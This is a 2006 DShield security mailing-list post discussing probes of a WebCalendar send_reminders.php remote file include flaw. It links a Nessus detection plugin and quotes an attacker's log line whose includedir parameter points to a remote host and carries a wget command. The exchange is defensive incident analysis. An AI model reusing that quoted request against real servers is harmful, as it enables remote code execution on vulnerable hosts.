[Dshield] Webcal Exploit?

George A. Theall theall at tifaware.com
Mon Feb 6 19:35:48 GMT 2006


On Mon, Feb 06, 2006 at 12:57:20PM -0500, David Cary Hart wrote:
> On Mon, 6 Feb 2006 07:16:06 -0500
> "George A. Theall" <theall at tifaware.com> opined:
> > Is it possible they're targetting webcalendar rather than webcal? There
> > was a remote file include flaw in its 'send_reminders.php' script
> > announced last August (Bugtraq ID 14651). 
> > 
> Here was the first one. I have seen four or five since, all the same pattern
> except domain instead of IPA:
> 
>
> 81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET
> http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> HTTP/1.0" 302 290

Yes, that's from BID 14651.  I wrote a Nessus plugin for that last
August:

  http://www.nessus.org/plugins/index.php?view=single&id=19502

George
-- 
theall at tifaware.com
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://www.dshield.org/pipermail/list/attachments/20060206/a0e9b546/attachment.bin


More information about the list mailing list